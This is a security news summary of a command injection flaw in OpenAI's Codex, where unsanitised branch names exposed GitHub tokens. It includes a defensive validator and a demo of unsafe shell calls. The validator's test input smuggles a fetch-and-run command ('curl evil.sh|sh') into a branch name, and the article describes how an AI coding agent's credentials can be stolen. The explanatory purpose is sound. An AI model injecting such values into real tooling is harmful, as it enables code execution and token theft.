OpenAI Codex Had a Command Injection Bug That Could Steal GitHub Tokens
A vulnerability was discovered in OpenAI's Codex that allowed attackers to inject arbitrary shell commands through malicious branch names, exposing GitHub OAuth tokens with broad permissions.
Why it matters
This vulnerability highlights the security risks associated with AI coding tools that have broad access to developer credentials and execution environments.
Key Points
- Codex had a command injection vulnerability in branch name handling
- Attackers could craft malicious branch names to execute arbitrary commands
- The commands had access to Codex's GitHub OAuth tokens with read/write and organization-level permissions
- The vulnerability affected the Codex web interface, CLI, SDK, and IDE integrations
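The branch-name handling issue behind these points comes down to missing input validation. A minimal defensive sketch is shown below; the regex, function name, and character allowlist are illustrative assumptions, not Codex's actual code (Git accepts a wider set of characters than this, but a conservative allowlist rejects shell metacharacters outright):

```python
import re

# Hypothetical allowlist check run before a branch name ever reaches a
# shell. Anything outside letters, digits, dot, underscore, slash, and
# hyphen is rejected, which excludes ';', '|', '$', backticks, etc.
SAFE_BRANCH = re.compile(r"^[A-Za-z0-9._/-]+$")

def is_safe_branch(name: str) -> bool:
    # Also reject '..' to avoid ref/path traversal tricks.
    return bool(SAFE_BRANCH.fullmatch(name)) and ".." not in name

print(is_safe_branch("feature/login-fix"))      # True
print(is_safe_branch("main; curl evil.sh|sh"))  # False
```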
Details
The vulnerability was discovered by security researchers at BeyondTrust's Phantom Labs. Codex runs tasks inside managed containers that clone the user's GitHub repository and authenticate using short-lived OAuth tokens. However, branch names were not properly sanitized before being passed to shell commands during environment setup, so an attacker could inject arbitrary shell commands that would execute inside the container with access to the GitHub token.

This could give the attacker full read/write access to the repositories, let them trigger workflow actions (e.g., CI/CD pipelines), and potentially expose organization-level resources, depending on the token's scope. The researchers note that this class of vulnerability is often overlooked by "vibe coders" who may not review branch names for injection payloads, audit tool permissions, or fully understand the security implications of AI coding assistants.
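The injection pattern described above can be reproduced in miniature. This sketch uses `echo` as a stand-in for the real setup command and a contrived branch name; it is not Codex's actual code, only a demonstration of why string-interpolated shell commands are dangerous and argument lists are not:

```python
import subprocess

# Attacker-controlled branch name containing a shell metacharacter.
branch = "main; echo INJECTED"

# Unsafe: with shell=True, ';' is interpreted as a command separator,
# so the attacker's command runs as well.
unsafe = subprocess.run(f"echo cloning {branch}", shell=True,
                        capture_output=True, text=True)

# Safe: passing arguments as a list makes the branch name a single
# argv entry, so metacharacters are treated as literal text.
safe = subprocess.run(["echo", "cloning", branch],
                      capture_output=True, text=True)

print(unsafe.stdout)  # second command executed: "INJECTED" on its own line
print(safe.stdout)    # whole branch name printed literally, ';' included
```

The same principle applies to any language: build the command as an argument vector (or use a Git library) rather than concatenating untrusted input into a shell string.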